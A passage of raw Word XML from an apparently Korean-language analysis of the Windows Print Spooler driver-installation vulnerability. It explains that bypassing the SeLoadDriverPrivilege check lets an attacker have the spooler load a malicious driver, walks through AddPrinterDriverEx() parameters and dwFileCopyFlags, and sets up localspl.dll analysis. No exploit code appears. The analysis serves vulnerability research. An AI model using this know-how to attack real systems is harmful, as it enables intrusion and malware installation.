          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 권한에 관한 자세한 설명은 아래 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공식 문서에서 볼 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF4335A" w14:textId="4AFBBFD3" w:rsidR="00A53E94" w:rsidRDefault="004E6F89" w:rsidP="009E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6F89">
        <w:t>https://docs.microsoft.com/ko-kr/windows/security/threat-protection/security-policy-settings/load-and-unload-device-drivers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FAD187" w14:textId="77777777" w:rsidR="004E6F89" w:rsidRPr="009E113D" w:rsidRDefault="004E6F89" w:rsidP="00E94A55"/>
    <w:p w14:paraId="661EF65B" w14:textId="6FC1D501" w:rsidR="00A53E94" w:rsidRDefault="00A53E94" w:rsidP="00E94A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 S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eLoadDriverPrivilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>권한에 대한 검사를 우회함으로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공격자는 원하는 l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ocal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>printer driver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 설치할 수 있게 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드라이버를 설치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indows print Spooler </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서비스가 해당 드라이버를 로드하여 악성코드를 설치할 수 있도록 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061808FC" w14:textId="77777777" w:rsidR="00E4591E" w:rsidRDefault="00A53E94" w:rsidP="00A53E94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860784E" w14:textId="1AEFFC05" w:rsidR="00E4591E" w:rsidRDefault="00E4591E" w:rsidP="00E4591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[</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4591E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AddPrinterDriverEx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 함</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436AED87" w14:textId="7F0B764A" w:rsidR="00A53E94" w:rsidRDefault="00A53E94" w:rsidP="00A53E9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szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">그럼 </w:t>
      </w:r>
      <w:r w:rsidR="00E4591E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>인증 우회를 위해서</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Hlk78215667"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ddPrinterDriverEx</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00E4591E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함수에 대해서 알아봐야 합니다.</w:t>
      </w:r>
      <w:r w:rsidR="00E4591E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E4591E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">해당 함수는 </w:t>
      </w:r>
      <w:r w:rsidR="00E4591E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Windows Print Spooler</w:t>
      </w:r>
      <w:r w:rsidR="00E4591E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서비스에서 로컬 또는 원격 프린터 드라이버를 설치하고 구성,</w:t>
      </w:r>
      <w:r w:rsidR="00E4591E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E4591E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>데이터 및</w:t>
      </w:r>
      <w:r w:rsidR="00E4591E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E4591E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>드라이버 파일을 연결합니다.</w:t>
      </w:r>
      <w:r w:rsidR="00E4591E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E4591E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">추가 정보는 </w:t>
      </w:r>
      <w:r w:rsidR="00E4591E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>MS</w:t>
      </w:r>
      <w:r w:rsidR="00E4591E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 공식 문서를 통해 확인 가능합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C5E6C5" w14:textId="77777777" w:rsidR="00D640D0" w:rsidRPr="00E4591E" w:rsidRDefault="00D640D0" w:rsidP="00A53E94">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B65219F" w14:textId="77777777" w:rsidR="00E4591E" w:rsidRDefault="00E4591E" w:rsidP="00E4591E">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r w:rsidRPr="00E4591E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FC445D9" wp14:editId="6FF40E50">
            <wp:extent cx="5731510" cy="3384550"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="254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CD8F1" w14:textId="7B0F5451" w:rsidR="00E4591E" w:rsidRDefault="00E4591E" w:rsidP="00E4591E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/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>S Document AddPrinterDriverEx()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A40B277" w14:textId="77777777" w:rsidR="00D640D0" w:rsidRDefault="00D640D0" w:rsidP="00E4591E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="162296EC" w14:textId="17BE41AC" w:rsidR="00E4591E" w:rsidRDefault="00E4591E" w:rsidP="00E4591E">
      <w:pPr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ddPrinterDriverEx()를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>실행하려면</w:t>
      </w:r>
      <w:r w:rsidR="00D640D0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 아래</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 매개변수를 필요로 합니다.</w:t>
      </w:r>
      <w:r w:rsidR="009E113D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E113D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>각 매개변수의 설명</w:t>
      </w:r>
      <w:r w:rsidR="00D640D0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 봅시다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017E388E" w14:textId="73153539" w:rsidR="009E113D" w:rsidRPr="009E113D" w:rsidRDefault="009E113D" w:rsidP="009E113D">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E113D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="009E113D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Name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드라이버를 설치할 서버 이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n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ull</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이면 l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ocal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에 저장.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D70ADA" w14:textId="2EC71EF4" w:rsidR="009E113D" w:rsidRPr="009E113D" w:rsidRDefault="009E113D" w:rsidP="009E113D">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E113D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="009E113D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>evel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D640D0" w:rsidRPr="009E113D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00D640D0" w:rsidRPr="009E113D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>DiverInfo</w:t>
      </w:r>
      <w:r w:rsidR="00D640D0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>포인트구조의 버전.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1753F4A3" w14:textId="310D780E" w:rsidR="009E113D" w:rsidRPr="009E113D" w:rsidRDefault="009E113D" w:rsidP="009E113D">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E113D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="009E113D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>DiverInfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D640D0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>프린터 드라이버 정보가 포함된 구조 포인터.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C4C121" w14:textId="4433175E" w:rsidR="009E113D" w:rsidRPr="00D640D0" w:rsidRDefault="009E113D" w:rsidP="009E113D">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D640D0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00D640D0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wFileCopyFlags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D640D0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>드라이버 파일을 복사하는 옵션.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7714381A" w14:textId="400452B7" w:rsidR="00D640D0" w:rsidRDefault="00D640D0" w:rsidP="00D640D0"/>
    <w:p w14:paraId="00E5FE31" w14:textId="4672D0E1" w:rsidR="009C231E" w:rsidRDefault="00D640D0" w:rsidP="00D640D0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">여기서 가장 주의깊게 보아야 하는 매개변수는 당연 </w:t>
      </w:r>
      <w:r>
        <w:t>dwFileCopyFlags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>입니다.</w:t>
      </w:r>
      <w:r w:rsidR="00E54647">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E54647">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하지만 지금 당장은 해당 함수가 어디에 존재하고 동작하는지 알아보기 위해 나중에 설명하겠습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC419A3" w14:textId="77777777" w:rsidR="009C231E" w:rsidRDefault="009C231E">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5620E15F" w14:textId="5D8D91CB" w:rsidR="00D640D0" w:rsidRDefault="00E544B5" w:rsidP="00D640D0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">우선 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rint Spooler </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서비스 프로세스를 연결하고 로드하는 라이브러리가 어떤 것인지 찾아봅시다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">스풀러 서비스에 </w:t>
      </w:r>
      <w:r>
        <w:t>dependencies(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>종속성</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">중 하나인 </w:t>
      </w:r>
      <w:r>
        <w:t>local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>pl.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 보겠습니다.</w:t>
      </w:r>
      <w:r w:rsidR="006458CB">
        <w:t xml:space="preserve"> localspl.dll</w:t>
      </w:r>
      <w:r w:rsidR="006458CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>은 로컬 서버에서 관리되는 프린터로 향하는 모든 인쇄 작업을 처리합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1F0253" w14:textId="427CEE5A" w:rsidR="006458CB" w:rsidRDefault="006458CB" w:rsidP="00D640D0">
      <w:r>
        <w:t>local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>pl.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 경로는 아래와 같습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD0C0EC" w14:textId="4EABABFC" w:rsidR="006458CB" w:rsidRDefault="006458CB" w:rsidP="00645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58CB">
        <w:t>C:\Windows\System32</w:t>
      </w:r>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>ocalspl.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF1C1EF" w14:textId="643B42E5" w:rsidR="006458CB" w:rsidRDefault="006458CB" w:rsidP="006458CB"/>
    <w:p w14:paraId="50823836" w14:textId="71CB770A" w:rsidR="006458CB" w:rsidRDefault="00E3020F" w:rsidP="006458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1EDE" wp14:editId="524E0982">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>19050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2086610</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="295402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F6887" w14:textId="74F1D26A" w:rsidR="00E3020F" w:rsidRDefault="00E3020F" w:rsidP="00E3020F">
                            <w:pPr>
                              <w:pStyle w:val="a6"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">사진 </w:t>
                            </w:r>
                            <w:r w:rsidR="001F39F4">
                              <w:t>3/Windows</w:t>
                            </w:r>
                            <w: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91E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64.3pt;width:232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9BLQIAAF0EAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6L06ypd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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3CAF6887" w14:textId="74F1D26A" w:rsidR="00E3020F" w:rsidRDefault="00E3020F" w:rsidP="00E3020F">
                      <w:pPr>
                        <w:pStyle w:val="a6"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">사진 </w:t>
                      </w:r>
                      <w:r w:rsidR="001F39F4">
                        <w:t>3/Windows</w:t>
                      </w:r>
                      <w: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20F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D5F327F" wp14:editId="11364DB6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>840381</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2954020" cy="1189355"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="1079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B2E6" wp14:editId="6B500818">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3140710</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4416425</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="257492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065F5" w14:textId="1BF441B4" w:rsidR="001F39F4" w:rsidRDefault="001F39F4" w:rsidP="001F39F4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>사진 4/localspl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2B2E6" id="Text Box 6" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:247.3pt;margin-top:347.75pt;width:20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YxLgIAAGQ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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="380065F5" w14:textId="1BF441B4" w:rsidR="001F39F4" w:rsidRDefault="001F39F4" w:rsidP="001F39F4">
                      <w:pPr>
                        <w:pStyle w:val="a6"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>사진 4/localspl.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20F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="779D459D" wp14:editId="78537DC5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>800735</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2574925" cy="3558540"/>
            <wp:effectExtent l="19050" t="19050" r="15875" b="2286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그렇다면 이제 l</w:t>
      </w:r>
      <w:r>
        <w:t>ocal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>pl.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 직접 분석해보아야 합니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">때문에 분석을 위하여 </w:t>
      </w:r>
      <w:r>
        <w:t>VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 통해 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Windows 10 20h2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>버전을 설치하였고,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해당 버전 d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ll </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일을 분석해 보겠습니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>아래는 분석</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>환경 정보입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389E6460" w14:textId="46A1E149" w:rsidR="00E3020F" w:rsidRDefault="00E3020F" w:rsidP="00E3020F"/>
    <w:p w14:paraId="4B4C796C" w14:textId="11EE960D" w:rsidR="00F53627" w:rsidRDefault="00F53627">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08FF19F0" w14:textId="3D92BBEB" w:rsidR="00F53627" w:rsidRDefault="00F53627">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="413FF4E5" w14:textId="4DA2DCD1" w:rsidR="00F53627" w:rsidRDefault="00F53627">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BFE1FC7" w14:textId="77777777" w:rsidR="00F53627" w:rsidRDefault="00F53627">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE6F63D" w14:textId="5F161E09" w:rsidR="00E3020F" w:rsidRDefault="00E3020F" w:rsidP="00E3020F"/>
    <w:p w14:paraId="6E8B2C23" w14:textId="6C2937FE" w:rsidR="00F53627" w:rsidRDefault="00F53627" w:rsidP="00E3020F"/>
    <w:p w14:paraId="73885905" w14:textId="77777777" w:rsidR="00F53627" w:rsidRDefault="00F53627" w:rsidP="00E3020F"/>
